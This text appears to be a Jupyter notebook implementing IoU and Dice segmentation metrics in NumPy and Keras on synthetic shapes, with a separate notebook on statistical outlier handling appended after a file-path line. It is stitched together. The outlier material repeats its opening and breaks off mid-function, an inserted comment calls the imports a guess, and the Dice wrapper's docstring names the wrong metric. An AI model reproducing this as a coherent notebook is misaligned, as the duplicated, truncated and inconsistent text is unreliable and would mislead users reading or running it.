Segmentation MetricsFor each metric I implement a Numpy and a Keras version, and verify that they give the same results. Examples are input images with squares and circles.
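As a reminder of the two definitions before the full implementations, here is a tiny hand-checkable sketch on 2x2 binary masks:
###Code
import numpy as np

t = np.array([[1, 1], [0, 0]])  # ground truth: 2 positive pixels
p = np.array([[1, 0], [0, 0]])  # prediction: 1 positive pixel, inside the truth
inter = np.logical_and(t, p).sum()               # 1
union = np.logical_or(t, p).sum()                # 2
print("IoU :", inter / union)                    # 1/2 = 0.5
print("Dice:", 2 * inter / (t.sum() + p.sum()))  # 2/3 ~ 0.667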
###Code
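# Imports assumed by this notebook but not shown in this extract (hedged guess based on the
# names used below: np, K, tf, plt, mpl; the notebook appears to use standalone Keras on a
# TensorFlow backend)
import numpy as np
import tensorflow as tf
import matplotlib as mpl
import matplotlib.pyplot as plt
from keras import backend as K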
def metrics_np(y_true, y_pred, metric_name, metric_type='standard', drop_last = True, mean_per_class=False, verbose=False):
"""
Compute mean metrics of two segmentation masks, via numpy.
IoU(A,B) = |A & B| / (| A U B|)
Dice(A,B) = 2*|A & B| / (|A| + |B|)
Args:
y_true: true masks, one-hot encoded.
y_pred: predicted masks, either softmax outputs, or one-hot encoded.
metric_name: metric to be computed, either 'iou' or 'dice'.
metric_type: one of 'standard' (default), 'soft', 'naive'.
In the standard version, y_pred is one-hot encoded and the mean
is taken only over classes that are present (in y_true or y_pred).
The 'soft' version of the metrics are computed without one-hot
encoding y_pred.
The 'naive' version return mean metrics where absent classes contribute
to the class mean as 1.0 (instead of being dropped from the mean).
drop_last = True: boolean flag to drop last class (usually reserved
for background class in semantic segmentation)
mean_per_class = False: return mean along batch axis for each class.
verbose = False: print intermediate results such as intersection, union
(as number of pixels).
Returns:
IoU/Dice of y_true and y_pred, as a float, unless mean_per_class == True
in which case it returns the per-class metric, averaged over the batch.
Inputs are B*W*H*N tensors, with
B = batch size,
W = width,
H = height,
N = number of classes
"""
assert y_true.shape == y_pred.shape, 'Input masks should be same shape, instead are {}, {}'.format(y_true.shape, y_pred.shape)
assert len(y_pred.shape) == 4, 'Inputs should be B*W*H*N tensors, instead have shape {}'.format(y_pred.shape)
flag_soft = (metric_type == 'soft')
flag_naive_mean = (metric_type == 'naive')
num_classes = y_pred.shape[-1]
# if only 1 class, there is no background class and it should never be dropped
drop_last = drop_last and num_classes>1
if not flag_soft:
if num_classes>1:
# get one-hot encoded masks from y_pred (true masks should already be in correct format, do it anyway)
y_pred = np.array([ np.argmax(y_pred, axis=-1)==i for i in range(num_classes) ]).transpose(1,2,3,0)
y_true = np.array([ np.argmax(y_true, axis=-1)==i for i in range(num_classes) ]).transpose(1,2,3,0)
else:
y_pred = (y_pred > 0).astype(int)
y_true = (y_true > 0).astype(int)
# intersection and union shapes are batch_size * n_classes (values = area in pixels)
axes = (1,2) # W,H axes of each image
intersection = np.sum(np.abs(y_pred * y_true), axis=axes) # or, np.logical_and(y_pred, y_true) for one-hot
mask_sum = np.sum(np.abs(y_true), axis=axes) + np.sum(np.abs(y_pred), axis=axes)
union = mask_sum - intersection # or, np.logical_or(y_pred, y_true) for one-hot
if verbose:
print('intersection (pred*true), intersection (pred&true), union (pred+true-inters), union (pred|true)')
print(intersection, np.sum(np.logical_and(y_pred, y_true), axis=axes), union, np.sum(np.logical_or(y_pred, y_true), axis=axes))
smooth = .001
iou = (intersection + smooth) / (union + smooth)
dice = 2*(intersection + smooth)/(mask_sum + smooth)
metric = {'iou': iou, 'dice': dice}[metric_name]
# define mask to be 0 when no pixels are present in either y_true or y_pred, 1 otherwise
mask = np.not_equal(union, 0).astype(int)
# mask = 1 - np.equal(union, 0).astype(int) # True = 1
if drop_last:
metric = metric[:,:-1]
mask = mask[:,:-1]
# return mean metrics: remaining axes are (batch, classes)
# if mean_per_class, average over batch axis only
# if flag_naive_mean, average over absent classes too
if mean_per_class:
if flag_naive_mean:
return np.mean(metric, axis=0)
else:
# mean only over non-absent classes in batch (still return 1 if class absent for whole batch)
return (np.sum(metric * mask, axis=0) + smooth)/(np.sum(mask, axis=0) + smooth)
else:
if flag_naive_mean:
return np.mean(metric)
else:
# mean only over non-absent classes
class_count = np.sum(mask, axis=0)
return np.mean(np.sum(metric * mask, axis=0)[class_count!=0]/(class_count[class_count!=0]))
def mean_iou_np(y_true, y_pred, **kwargs):
"""
Compute mean Intersection over Union of two segmentation masks, via numpy.
Calls metrics_np(y_true, y_pred, metric_name='iou'), see there for allowed kwargs.
"""
return metrics_np(y_true, y_pred, metric_name='iou', **kwargs)
def mean_dice_np(y_true, y_pred, **kwargs):
"""
Compute mean Dice coefficient of two segmentation masks, via numpy.
Calls metrics_np(y_true, y_pred, metric_name='dice'), see there for allowed kwargs.
"""
return metrics_np(y_true, y_pred, metric_name='dice', **kwargs)
# keras version
def seg_metrics(y_true, y_pred, metric_name, metric_type='standard', drop_last = True, mean_per_class=False, verbose=False):
"""
Compute mean metrics of two segmentation masks, via Keras.
IoU(A,B) = |A & B| / (| A U B|)
Dice(A,B) = 2*|A & B| / (|A| + |B|)
Args:
y_true: true masks, one-hot encoded.
y_pred: predicted masks, either softmax outputs, or one-hot encoded.
metric_name: metric to be computed, either 'iou' or 'dice'.
metric_type: one of 'standard' (default), 'soft', 'naive'.
In the standard version, y_pred is one-hot encoded and the mean
is taken only over classes that are present (in y_true or y_pred).
The 'soft' version of the metrics are computed without one-hot
encoding y_pred.
The 'naive' version return mean metrics where absent classes contribute
to the class mean as 1.0 (instead of being dropped from the mean).
drop_last = True: boolean flag to drop last class (usually reserved
for background class in semantic segmentation)
mean_per_class = False: return mean along batch axis for each class.
verbose = False: print intermediate results such as intersection, union
(as number of pixels).
Returns:
IoU/Dice of y_true and y_pred, as a float, unless mean_per_class == True
in which case it returns the per-class metric, averaged over the batch.
Inputs are B*W*H*N tensors, with
B = batch size,
W = width,
H = height,
N = number of classes
"""
flag_soft = (metric_type == 'soft')
flag_naive_mean = (metric_type == 'naive')
# always assume one or more classes
num_classes = K.shape(y_true)[-1]
if not flag_soft:
# get one-hot encoded masks from y_pred (true masks should already be one-hot)
y_pred = K.one_hot(K.argmax(y_pred), num_classes)
y_true = K.one_hot(K.argmax(y_true), num_classes)
# if already one-hot, could have skipped above command
# keras uses float32 instead of float64, would give error down (but numpy arrays or keras.to_categorical gives float64)
y_true = K.cast(y_true, 'float32')
y_pred = K.cast(y_pred, 'float32')
# intersection and union shapes are batch_size * n_classes (values = area in pixels)
axes = (1,2) # W,H axes of each image
intersection = K.sum(K.abs(y_true * y_pred), axis=axes)
mask_sum = K.sum(K.abs(y_true), axis=axes) + K.sum(K.abs(y_pred), axis=axes)
union = mask_sum - intersection # or, np.logical_or(y_pred, y_true) for one-hot
smooth = .001
iou = (intersection + smooth) / (union + smooth)
dice = 2 * (intersection + smooth)/(mask_sum + smooth)
metric = {'iou': iou, 'dice': dice}[metric_name]
# define mask to be 0 when no pixels are present in either y_true or y_pred, 1 otherwise
mask = K.cast(K.not_equal(union, 0), 'float32')
if drop_last:
metric = metric[:,:-1]
mask = mask[:,:-1]
if verbose:
print('intersection, union')
print(K.eval(intersection), K.eval(union))
print(K.eval(intersection/union))
# return mean metrics: remaining axes are (batch, classes)
if flag_naive_mean:
return K.mean(metric)
# take mean only over non-absent classes
class_count = K.sum(mask, axis=0)
non_zero = tf.greater(class_count, 0)
non_zero_sum = tf.boolean_mask(K.sum(metric * mask, axis=0), non_zero)
non_zero_count = tf.boolean_mask(class_count, non_zero)
if verbose:
print('Counts of inputs with class present, metrics for non-absent classes')
print(K.eval(class_count), K.eval(non_zero_sum / non_zero_count))
return K.mean(non_zero_sum / non_zero_count)
def mean_iou(y_true, y_pred, **kwargs):
"""
Compute mean Intersection over Union of two segmentation masks, via Keras.
Calls metrics_k(y_true, y_pred, metric_name='iou'), see there for allowed kwargs.
"""
return seg_metrics(y_true, y_pred, metric_name='iou', **kwargs)
def mean_dice(y_true, y_pred, **kwargs):
"""
Compute mean Dice coefficient of two segmentation masks, via Keras.
Calls metrics_k(y_true, y_pred, metric_name='iou'), see there for allowed kwargs.
"""
return seg_metrics(y_true, y_pred, metric_name='dice', **kwargs)
###Output
_____no_output_____
###Markdown
Input imagesI will build simple geometrical figures and use those as "objects" for assessing segmentation metrics. For example, see below how to generate circles and diamonds with numpy
###Code
x,y = np.meshgrid(np.arange(-7,7.1), np.arange(-7,7.1))
fig, (ax1, ax2) = plt.subplots(1,2,figsize = (13,4))
# ax1.contourf(x, y, circle, alpha=0.5)
# # ax1.scatter(x, y, circle)
# for i in range(len(x)):
# for j in range(len(y)):
# ax1.text(x[i][j], y[i][j], '%d'% circle[i][j], ha='center', va='center')
circle_fuzzy = np.minimum([1], np.maximum([0], 25-x**2-y**2)/20)
ax1.contourf(x, y, circle_fuzzy, alpha=0.4, vmin=0, vmax=1)
# ax1.scatter(x, y, circle_fuzzy)
for i in range(len(x)):
for j in range(len(y)):
fmt = '%d' if circle_fuzzy[i][j] %1 ==0 else '%1.1f'
ax1.text(x[i][j], y[i][j], fmt % circle_fuzzy[i][j] , ha='center', va='center')
diamond = np.minimum([1], np.maximum([0], (3 - abs(x)) + (3 - abs(y)))/3)
ax2.contourf(x,y,diamond, alpha=0.4, vmin=0, vmax=1)
for i in range(len(x)):
for j in range(len(y)):
fmt = '%d' if diamond[i][j] %1 ==0 else '%1.1f'
ax2.text(x[i][j], y[i][j], fmt % diamond[i][j] , ha='center', va='center')
for ax in (ax1, ax2): ax.set_axis_off()
###Output
_____no_output_____
###Markdown
Segmentation masks - for now only the object classes (circles, diamonds); background will be added later on. The ground-truth mask is zero/one outside/inside the object, while the predicted mask has continuous values.
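A tiny hedged illustration of the difference between the hard and soft IoU used below (values rounded; the hard version binarizes the single-class prediction with > 0, as metrics_np does):
###Code
# Hard vs. soft IoU on a 4-pixel, single-class example (sketch)
t = np.array([1.0, 1.0, 0.0, 0.0])  # ground truth
p = np.array([0.9, 0.6, 0.3, 0.0])  # soft prediction
hard_p = (p > 0).astype(int)        # -> [1, 1, 1, 0]
print("hard IoU:", np.logical_and(t, hard_p).sum() / np.logical_or(t, hard_p).sum())  # 2/3
soft_i = (t * p).sum()              # 1.5
soft_u = t.sum() + p.sum() - soft_i # 2.0 + 1.8 - 1.5 = 2.3
print("soft IoU:", soft_i / soft_u) # ~0.652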
###Code
def fuzzy_circle(xy=(0,0), r=4, fuzz_factor=0.8):
x0, y0 = xy
max_fuzz = fuzz_factor * r**2
circle = np.minimum([1], np.maximum([0], r**2 - (x-x0)**2 - (y-y0)**2)/max_fuzz)
return circle
def fuzzy_diamond(xy=(0,0), r=2, fuzz_factor=1.5):
x0, y0 = xy
max_fuzz = fuzz_factor * r
diamond = np.minimum([1], np.maximum([0], (r - abs(x-x0)) + (r-abs(y-y0)))/max_fuzz)
return diamond
fine_grid = np.meshgrid(np.arange(-7,7.1,0.05), np.arange(-7,7.1,0.05))
x,y = fine_grid
zz = fuzzy_circle((2,0), r=3, fuzz_factor=0.1)
plt.contour(x, y, zz, levels = [0.99], colors='b')
zz = fuzzy_circle((1,1))
plt.contourf(x, y, zz, alpha=0.5, levels=[0,0.25,0.5,0.75,0.99,1.25], cmap = 'gray_r')
zz = fuzzy_diamond(xy=(-3.5,-3.5))
plt.contourf(x, y, zz, alpha=0.5, levels=[0,0.25,0.5,0.75,0.99,1.25], cmap = 'gray_r')
plt.gca().set_aspect(1)
plt.gca().set_axis_off()
###Output
_____no_output_____
###Markdown
Compute IoU and Dice metrics for series of two overlapping circles
###Code
fig, axes = plt.subplots(1,3, figsize = (13,4))
params = [((0,0), 4), ((2,0), 4, ), ((2,0), 2) ]
y_true = fuzzy_circle(fuzz_factor=0.01)
print('{:<10s} {:<10s} {:<10s}'.format('','explicit', 'np function'))
for i in range(len(axes)):
axes[i].scatter(0,0, c='b')
axes[i].add_artist(plt.Circle((0, 0), 4.05, lw=2, edgecolor='b', facecolor=(0,0,1,0.3), zorder=1))
xy, r = params[i]
axes[i].scatter(*xy, c='r')
axes[i].add_artist(plt.Circle(xy, r, lw=2, ls='--', edgecolor='r', facecolor=(1,0,0,0.3), zorder=1))
smooth = 0.001
y_pred = fuzzy_circle(xy, r, 0.01)
intersection = np.sum(np.logical_and(y_true, y_pred))
union = np.sum(np.logical_or(y_pred, y_true))
iou = np.mean((intersection)/union)
dice = 2*np.mean(intersection/(np.sum(y_pred)+np.sum(y_true)))
print('{:<10s} {:<10.2f} {:<10.2f}'.format('IoU', iou, metrics_np(np.reshape(y_true, (1,)+y_true.shape+(1,)), np.reshape(y_pred, (1,)+y_pred.shape+(1,)), metric_name = 'iou')))
print('{:<10s} {:<10.2f} {:<10.2f}'.format('Dice', dice, metrics_np(np.reshape(y_true, (1,)+y_true.shape+(1,)), np.reshape(y_pred, (1,)+y_pred.shape+(1,)), metric_name = 'dice')))
axes[i].text(0,5, f'IoU={iou:1.2f}\nDice={dice:1.2f}', ha='center')
axes[i].set_axis_off()
axes[i].set(aspect=1, xlim=(-5,6.1), ylim=(-5,6))
fig.savefig('metrics_iou_dice.png',bbox_inches='tight')
x,y = fine_grid
fig, axes = plt.subplots(1,4, figsize = (16,4))
params = [((0,0), 4, 0.8), ((0,0), 4, 1), ((2,0), 4, 0.8), ((2,0), 2, 0.8) ]
y_true = fuzzy_circle(fuzz_factor=0.01)
print('{:<10s} {:<10s} {:<10s}'.format('','explicit', 'np function'))
for i in range(len(axes)):
# axes[i].contour(x, y, y_true, levels = [0.99], colors='b')
axes[i].add_artist(plt.Circle((0, 0), 4, lw=2, edgecolor='b', facecolor=(0,0,0,0), zorder=1))
xy, r, fuzz_factor = params[i]
y_pred = fuzzy_circle(xy, r, fuzz_factor)
# axes[i].contourf(x, y, y_pred, alpha=0.5, levels=[0.01,0.5,0.99,1.25], cmap = 'gray_r')
axes[i].pcolormesh(x, y, y_pred, alpha=0.3, shading='gouraud', cmap = 'gray_r')
cs = axes[i].contour(x, y, y_pred, levels=[0.01,0.5,0.99,1.25], colors = 'k')
axes[i].clabel(cs, fmt='%1.1f')
intersection = np.sum(np.logical_and(y_true, y_pred))
union = np.sum(np.logical_or(y_pred, y_true))
iou = np.mean(intersection/union)
intersection_soft = np.sum(np.abs(y_true * y_pred))
union_soft = np.sum(np.abs(y_pred)) + np.sum(np.abs(y_true)) - intersection_soft
iou_soft = np.mean(intersection_soft/union_soft)
print('{:<10s} {:<10.2f} {:<10.2f}'.format('IoU',iou, metrics_np(np.reshape(y_true, (1,)+y_true.shape+(1,)), np.reshape(y_pred, (1,)+y_pred.shape+(1,)), metric_name='iou')))
print('{:<10s} {:<10.2f} {:<10.2f}'.format('soft IoU',iou_soft, metrics_np(np.reshape(y_true, (1,)+y_true.shape+(1,)), np.reshape(y_pred, (1,)+y_pred.shape+(1,)),metric_name='iou', metric_type='soft')))
axes[i].text(0,5, f'IoU={iou:1.2f}\nsoft IoU={iou_soft:1.2f}', ha='center')
axes[i].set_axis_off()
axes[i].set(aspect=1)
fig.savefig('metrics_iou_dice_soft.png',bbox_inches='tight')
y_true = fuzzy_circle(fuzz_factor=0.01)
y_pred = fuzzy_circle((2,0), 4, 0.8)
fig, axes = plt.subplots(1,3, figsize=(9,3))
for ax in axes:
ax.set_axis_off(); ax.set(aspect=1)
ax.add_artist(plt.Circle((0, 0), 4, lw=2, edgecolor='b', facecolor=(0,0,0,0), zorder=1))
ax.text(-2,4,'True\n mask', ha='center', va='bottom', color='b')
ax.add_artist(plt.Circle((2, 0), 4, lw=2, edgecolor='r', facecolor=(0,0,0,0), zorder=1))
ax.text(4,4,'Predicted\n mask', ha='center', va='bottom', color='r')
iax=list(axes).index(ax)
if iax>0:
axes[iax].annotate(['hard ','soft '][iax-1]+'intersection', (1,-2), xytext=(0,-6), ha='center', arrowprops={'arrowstyle': '->', 'color':'y'}, zorder=2)
axes[0].pcolormesh(x,y, y_pred, cmap='gray_r')
axes[1].pcolormesh(x,y, np.logical_and(y_true, y_pred), cmap='gray_r')
axes[2].pcolormesh(x,y, y_true * y_pred, cmap='gray_r');
fig.savefig('metrics_intersection_soft.png',bbox_inches='tight')
###Output
_____no_output_____
###Markdown
To test the non-naive mean_IoU, I need multiple classes, the masks of which overlap for only a small subset. I will arbitrarily take a circle and a diamond as examples of two classes, offset them a little and then find the IoU's
###Code
x,y = fine_grid
true1 = fuzzy_circle(xy=(2,0), fuzz_factor=0.01)
pred1 = fuzzy_circle(xy=(3,0))
# two instances of Diamond class: first has IoU=0.33 (half overlap), second one has IoU=0.24
true2 = fuzzy_diamond(xy=(-4,-2),r=1,fuzz_factor=0.01) + fuzzy_diamond(xy=(-3.5,3),r=1,fuzz_factor=0.01)
pred2 = fuzzy_diamond(xy=(-5,-3),r=1) + fuzzy_diamond(xy=(-5,3),r=1)
empty = np.zeros_like(true1)
plt.contour(x,y,true1, colors='r')
plt.contour(x,y,true2, colors='b')
plt.pcolormesh(x,y,pred1, cmap=mpl.colors.ListedColormap([(0,0,0,0)]+list(map(plt.get_cmap('Oranges'), range(256)))[1:]))
plt.pcolormesh(x,y,pred2, cmap=mpl.colors.ListedColormap([(0,0,0,0)]+list(map(plt.get_cmap('Purples'), range(256)))[1:]))
plt.gca().set_axis_off()
plt.gca().set(aspect=1)
y_true = np.expand_dims(np.stack([true1, true2, empty, empty, (true1==0) & (true2==0).astype(int)], axis=-1), axis=0)
y_pred = np.expand_dims(np.stack([pred1, pred2, empty, empty, (pred1==0) & (pred2==0).astype(int)], axis=-1), axis=0)
print('{:<60s} {:.3f}'.format('IoU of first class:', metrics_np(y_true[:,:,:,:1], y_pred[:,:,:,:1], metric_name='iou')))
print('{:<60s} {:.3f}'.format('IoU of second class:', metrics_np(y_true[:,:,:,1:2], y_pred[:,:,:,1:2], metric_name='iou')))
print('{:<60s} {:.3f}'.format('IoU of background:', metrics_np(y_true[:,:,:,-1:], y_pred[:,:,:,-1:], metric_name='iou')))
print('{:<60s} {}'.format('IoU of each class (explicit list):', metrics_np(y_true, y_pred, metric_name='iou', metric_type='naive', drop_last=False, mean_per_class=True)))
print('{:<60s} {:.3f}'.format('mean IoU of all classes (no background, naive mean):', metrics_np(y_true, y_pred, metric_name='iou', metric_type='naive')))
print('{:<60s} {:.3f}'.format('mean IoU of all classes (with background, naive mean):', metrics_np(y_true, y_pred, metric_name='iou', metric_type='naive', drop_last = False)))
print('{:<60s} {:.3f}'.format('mean IoU of all non-absent classes (dropping background):', metrics_np(y_true, y_pred, metric_name='iou')))
plt.text(5,6,'Circle\nIoU={:1.2f}'.format(metrics_np(y_true[:,:,:,:1], y_pred[:,:,:,:1], metric_name='iou')), color='r', ha='center', va='center')
plt.text(-5,6,'Diamond\nIoU={:1.2f}'.format(metrics_np(y_true[:,:,:,1:2], y_pred[:,:,:,1:2], metric_name='iou')), color='b', ha='center', va='center')
plt.text(0,-5,'mean IoU={:1.2f}'.format(metrics_np(y_true, y_pred, metric_name='iou')), ha='center', va='bottom');
plt.savefig('metrics_mean_iou_multiclass.png', bbox_inches='tight')
###Output
IoU of first class: 0.726
IoU of second class: 0.286
IoU of background: 0.775
IoU of each class (explicit list): [0.72645972 0.28643223 1. 1. 0.7748001 ]
mean IoU of all classes (no background, naive mean): 0.753
mean IoU of all classes (with background, naive mean): 0.758
mean IoU of all non-absent classes (dropping background): 0.506
###Markdown
So far I have used `batch_size=1`. Test the difference between naive and standard ways to take the mean, for multiple examples. Here I will take two images, the first with two classes as above and the second one with only the circle.
###Code
y_true = np.stack([np.stack([true1, true2, empty, empty, (true1==0) & (true2==0).astype(int)], axis=-1),
np.stack([true1, empty, empty, empty, (true1==0)], axis=-1)])
y_pred = np.stack([np.stack([pred1, pred2, empty, empty, (pred1==0) & (pred2==0).astype(int)], axis=-1),
np.stack([pred1, empty, empty, empty, (pred1==0)], axis=-1)])
print('Naive per-class mean: {} -- Overall mean: {:1.2f}'.format(
metrics_np(y_true, y_pred, metric_name='iou', metric_type='naive', mean_per_class=True),
metrics_np(y_true, y_pred, metric_name='iou', metric_type='naive')))
print('Standard per-class mean: {} -- Overall mean: {:1.2f}'.format(
metrics_np(y_true, y_pred, metric_name='iou', mean_per_class=True),
metrics_np(y_true, y_pred, metric_name='iou')))
print('Standard per-class mean, with background', metrics_np(y_true, y_pred, metric_name='iou', mean_per_class=True, drop_last=False))
# metrics_np(y_true, y_pred, metric_name='iou', mean_per_class=True),\
# metrics_np(y_true, y_pred, metric_name='iou'),\
print('Soft per-class mean ', metrics_np(y_true, y_pred, metric_name='iou', metric_type='soft', mean_per_class=True))
###Output
Naive per-class mean: [0.72645972 0.64321612 1. 1. ] -- Overall mean: 0.84
Standard per-class mean: [0.72659643 0.28714509 1. 1. ] -- Overall mean: 0.51
Standard per-class mean, with background [0.72659643 0.28714509 1. 1. 0.83668973]
Soft per-class mean [0.54782264 0.17182951 1. 1. ]
###Markdown
Test Keras version and verify it gives same result as Numpy
###Code
print('hard IoU {:1.6f} {:1.6f}'.format(metrics_np(y_true, y_pred, metric_name='iou'),
K.eval(seg_metrics(y_true, y_pred, metric_name='iou'))))
print('soft IoU {:1.6f} {:1.6f}'.format(metrics_np(y_true, y_pred, metric_name='iou', metric_type='soft'),
K.eval(seg_metrics(y_true, y_pred, metric_name='iou', metric_type='soft'))))
print('hard IoU, naive mean {:1.6f} {:1.6f}'.format(metrics_np(y_true, y_pred, metric_name='iou', metric_type='naive'),
K.eval(seg_metrics(y_true, y_pred, metric_name='iou', metric_type='naive'))))
print('hard Dice {:1.6f} {:1.6f}'.format(metrics_np(y_true, y_pred, metric_name='dice'),
K.eval(seg_metrics(y_true, y_pred, metric_name='dice'))))
###Output
hard IoU 0.506446 0.506446
soft IoU 0.359299 0.359298
hard IoU, naive mean 0.842419 0.842419
hard Dice 0.643436 0.643436
###Markdown
Print verbose info for metrics: look at number of pixels in intersection, union for each class and each input (`batch * classes` axes)
###Code
metrics_np(y_true, y_pred, metric_name='iou', verbose=True),\
metrics_np(y_true, y_pred, metric_name='iou', metric_type='standard', mean_per_class=True),\
K.eval(seg_metrics(y_true, y_pred, metric_name='iou', verbose=True))
###Output
intersection (pred*true), intersection (pred&true), union (pred+true-inters), union (pred|true)
[[16896 2850 0 0 46316]
[16896 0 0 0 56266]] [[16896 2850 0 0 46316]
[16896 0 0 0 56266]] [[23258 9950 0 0 59778]
[23258 0 0 0 62628]] [[23258 9950 0 0 59778]
[23258 0 0 0 62628]]
intersection, union
[[16896. 2850. 0. 0. 46316.]
[16896. 0. 0. 0. 56266.]] [[23258. 9950. 0. 0. 59778.]
[23258. 0. 0. 0. 62628.]]
[[0.72645974 0.28643215 nan nan 0.7748001 ]
[0.72645974 nan nan nan 0.89841604]]
Counts of inputs with class present, metrics for non-absent classes
[2. 1. 0. 0.] [0.72645974 0.28643224]
###Markdown
Coarse-grained exampleImage with few pixels to explicitly check what is going on at the pixel level
###Code
x,y = np.meshgrid(np.arange(-7,7.1,1), np.arange(-7,7.1,1))
true1 = fuzzy_circle(xy=(2,0), fuzz_factor=0.01)
pred1 = fuzzy_circle(xy=(3,0), fuzz_factor=1)
# two instances of Diamond class: first has IoU=0.33 (half overlap), second one has IoU=0.24
true2 = fuzzy_diamond(xy=(-4,-2),r=1,fuzz_factor=0.01) + fuzzy_diamond(xy=(-3,3),r=1,fuzz_factor=0.01)
pred2 = fuzzy_diamond(xy=(-5,-3),r=1) + fuzzy_diamond(xy=(-5,3),r=1)
empty = np.zeros_like(true1)
# build N*W*H*C ground truth and predicted masks
y_true = np.stack([np.stack([true1, true2, empty, empty, (true1==0) & (true2==0).astype(int)], axis=-1),
np.stack([true1, empty, empty, empty, (true1==0)], axis=-1)])
y_pred = np.stack([np.stack([pred1, pred2, empty, empty, (pred1==0) & (pred2==0).astype(int)], axis=-1),
np.stack([pred1, empty, empty, empty, (pred1==0)], axis=-1)])
# plot predicted masks
plt.pcolormesh(x,y,pred1, cmap=mpl.colors.ListedColormap([(0,0,0,0)]+list(map(plt.get_cmap('Oranges'), range(256)))[1:]))
plt.pcolormesh(x,y,pred2, cmap=mpl.colors.ListedColormap([(0,0,0,0)]+list(map(plt.get_cmap('Purples'), range(256)))[1:]))
# plot true masks
plt.pcolormesh(x,y,true1, cmap=mpl.colors.ListedColormap([(0,0,0,0), (1,0,0,0.2)]))
plt.pcolormesh(x,y,true2, cmap=mpl.colors.ListedColormap([(0,0,0,0), (0,0,1,0.2)]))
for i in range(len(x)):
for j in range(len(y)):
if pred1[i][j]!=0:
fmt = '%d' if pred1[i][j] %1 ==0 else '%1.1f'
plt.text(x[i][j]+0.5, y[i][j]+0.5, fmt % pred1[i][j] , ha='center', va='center')
if pred2[i][j]!=0:
fmt = '%d' if pred2[i][j] %1 ==0 else '%1.1f'
plt.text(x[i][j]+0.5, y[i][j]+0.5, fmt % pred2[i][j] , ha='center', va='center')
plt.text(5,6,'Circles\n(I,U)=({:},{:})\nIoU={:1.2f}'.format(np.logical_and(pred1, true1).sum(), np.logical_or(pred1, true1).sum(),
metrics_np(y_true[:1,:,:,:1], y_pred[:1,:,:,:1], metric_name='iou')), color='r', ha='center', va='center')
plt.text(-5.5,0.5,'Diamonds\n(I,U)=({:},{:})\nIoU={:1.2f}'.format(np.logical_and(pred2, true2).sum(), np.logical_or(pred2, true2).sum(),
metrics_np(y_true[:1,:,:,1:2], y_pred[:1,:,:,1:2], metric_name='iou')), color='b', ha='center', va='center')
plt.text(0,-5,'mean IoU={:1.2f}'.format(metrics_np(y_true[:1], y_pred[:1], metric_name='iou')), ha='center', va='bottom');
plt.gca().set_axis_off()
# plt.gca().set(aspect=1)
plt.savefig('metrics_mean_iou_coarse_example.png', bbox_inches='tight')
metrics_np(y_true, y_pred, metric_name='iou',verbose=True),\
metrics_np(y_true, y_pred, metric_name='iou', mean_per_class=True),\
K.eval(seg_metrics(y_true, y_pred, metric_name='iou', verbose=True))
###Output
intersection (pred*true), intersection (pred&true), union (pred+true-inters), union (pred|true)
[[ 38 3 0 0 156]
[ 38 0 0 0 173]] [[ 38 3 0 0 156]
[ 38 0 0 0 173]] [[ 52 17 0 0 184]
[ 52 0 0 0 187]] [[ 52 17 0 0 184]
[ 52 0 0 0 187]]
intersection, union
[[ 38. 3. 0. 0. 156.]
[ 38. 0. 0. 0. 173.]] [[ 52. 17. 0. 0. 184.]
[ 52. 0. 0. 0. 187.]]
[[0.7307692 0.1764706 nan nan 0.84782606]
[0.7307692 nan nan nan 0.9251337 ]]
Counts of inputs with class present, metrics for non-absent classes
[2. 1. 0. 0.] [0.7307744 0.17651904]
|
02DataPreprocess/02Outlier.ipynb | ###Markdown
Handling outliers* Statistically, an outlier is a data point that differs greatly from the other observations.* Outliers can cause problems for statistical analysis (they affect the mean and the standard deviation). Identifying outliers* Values that fall outside the interval [Q1 - 1.5*IQR ~ Q3 + 1.5*IQR]* Values that fall outside the 5th ~ 95th percentile range
###Code
import pandas as pd
import numpy as np
# arbitrary data that contains outliers
x = pd.Series([23,1,3,5,34,6,32,7,45,34,78])
x.describe()
###Output
_____no_output_____
###Markdown
Statistically, values that fall outside the interval [Q1 - 1.5*IQR ~ Q3 + 1.5*IQR] are usually considered outliers.
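As a quick illustration (assuming the series `x` from the cell above), the bounds can also be computed directly with pandas; this mirrors the `idx_of_outliers` helper defined in the next cell.

```python
# Quick illustration of the IQR rule on the series x defined above
q1, q3 = x.quantile(0.25), x.quantile(0.75)
iqr = q3 - q1
lower, upper = q1 - 1.5 * iqr, q3 + 1.5 * iqr
print(lower, upper)                    # the "normal" range
print(x[(x < lower) | (x > upper)])    # points flagged as outliers
```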
###Code
# Define a function that returns the indices of the outliers.
def idx_of_outliers(x):
q1, q3 = np.percentile(x, [25,75])
IQR = q3 - q1
lower_bound = q1 - [IQR * 1.5]
upper_bound = q3 + [IQR * 1.5]
return np.where((x > upper_bound) | (x < lower_bound))
idx_of_outliers(x.to_numpy())
###Output
_____no_output_____
###Markdown
Values that fall outside the 5th ~ 95th percentile range can also be treated as outliers.
###Code
print('5th percentile: ', x.quantile(q=0.05))
print('95th percentile: ', x.quantile(q=0.95))
x[(x < x.quantile(q=0.05)) | (x > x.quantile(q=0.95))]
###Output
_____no_output_____
###Markdown
Handling outliers* Remove the outlier values* Transform the values, for example by taking the natural log to reduce their magnitude
###Code
houses = pd.DataFrame()
houses['Price'] = [534433, 392333, 293222, 4322032]
houses['Bedrooms'] = [2, 3.5, 2, 116]
houses['Square_Feets'] = [1500, 2500, 1500, 48000]
houses
###Output
_____no_output_____
###Markdown
The simplest way to handle outliers is to delete them.
###Code
houses.describe()
q1 = houses['Bedrooms'].quantile(0.25)
q3 = houses['Bedrooms'].quantile(0.75)
iqr = q3 - q1
# Apply filter with respect to IQR
filter = (houses['Bedrooms'] >= q1 - 1.5*iqr) & (houses['Bedrooms'] <= q3 + 1.5*iqr)
houses.loc[filter]
###Output
_____no_output_____
###Markdown
Transform the column so that the influence of the outliers is reduced.
###Code
# log transform
houses['Log_Square_Feets'] = [np.log(x) for x in houses['Square_Feets']]
houses
###Output
_____no_output_____
###Markdown
Handling outliers* Statistically, an outlier is a data point that differs greatly from the other observations.* Outliers can cause problems for statistical analysis (they affect the mean and the standard deviation). Identifying outliers* Values that fall outside the interval [Q1 - 1.5*IQR ~ Q3 + 1.5*IQR]* Values that fall outside the 5th ~ 95th percentile range
###Code
import pandas as pd
import numpy as np
# arbitrary data that contains outliers
x = pd.Series([23,1,3,5,34,6,32,7,45,34,78])
x.describe()
###Output
_____no_output_____
###Markdown
Statistically, values that fall outside the interval [Q1 - 1.5*IQR ~ Q3 + 1.5*IQR] are usually considered outliers.
###Code
# Define a function that returns the indices of the outliers.
def idx_of_outliers(x):
q1, q3 = np.percentile(x, [25,75])
IQR = q3 - q1
lower_bound = q1 - [IQR * 1.5]
